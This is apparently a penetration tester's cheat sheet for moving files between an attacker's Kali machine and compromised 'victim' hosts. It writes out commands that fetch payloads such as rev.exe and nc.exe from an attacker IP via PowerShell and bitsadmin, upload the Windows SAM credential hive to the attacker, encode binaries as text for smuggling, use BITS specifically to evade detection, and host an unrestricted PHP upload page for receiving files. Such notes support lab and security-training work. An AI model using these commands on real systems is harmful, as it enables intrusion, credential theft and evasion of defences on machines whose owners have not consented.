Cheat sheet for transferring (downloading/uploading) files between machines.
💡 On Windows, C:\ProgramData is often writable.
Web server
💡 Use updog, a replacement for SimpleHTTPServer that allows upload!
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.x
python3 -m http.server 80
sudo service apache2 start
Transfer binary files (convert to ascii)
Optional: Compress binary file
Use an executable packer (PE compression tool). The file is still executable after!
cd /home/kali/share
upx -9 nc.exe
Convert binary file to ascii
exe2hex -x nc.exe -p nc.cmd
Transfer the file using any other method.
Reconstruct the binary file
The last command is in Powershell and will reconstruct the binary file.
.\nc.cmd
FTP
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
ftp anonymous@x.x.x.x
wget
Proxy configuration
nano /etc/wgetrc
http_proxy = http://127.0.0.1:3128
use_proxy = on
Download file in current directory
wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
Download folder
wget -r "https://whatever/foldernameendingwithaslash/"
curl
curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
axel
Download accelerator.
axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
netcat
See Netcat.
Powershell
See Powershell Cheat Sheet for more examples.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"
scp (secure copy)
scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2
sudo service ssh start
Windows (victim) to Kali
scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/
Linux (victim) to Kali
scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/
Background Intelligent Transfer Service (BITS) on Windows
💡 Useful to evade detection since BITS is used for Windows Updates.
Download file
bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
Upload file
bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
Impacket
See Impacket.
- Start SMB server on Kali Linux. See this post.
- On the Windows machine, copy file from Kali
💡 Supports binary file transfer. SEE ALSO impacket-wmiexec!!
On Kali
sudo impacket-smbserver myshare /home/kali/share
On Windows
net view \\<KALI IP>
dir \\<KALI IP>\<sharename>
copy <source> <destination>
copy <filename> \\<KALI IP>\<sharename>\<filename>
copy \\<KALI IP>\<sharename>\<filename> <filename>
PHP File Upload
On Kali, host a file upload page on Apache Web Server.
sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploads
sudo service apache2 start
upload.php
sudo nano /var/www/html/upload.php
<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file)
?>
upload.html
sudo nano /var/www/html/upload.html
<html>
<head></head>
<body>
<form action="./upload.php" method="POST" enctype="multipart/form-data">
File<br>
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">
</form>
</body>
</html>
On the victim
Open a web browser and go to http://<KALI_IP>/upload.html
powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')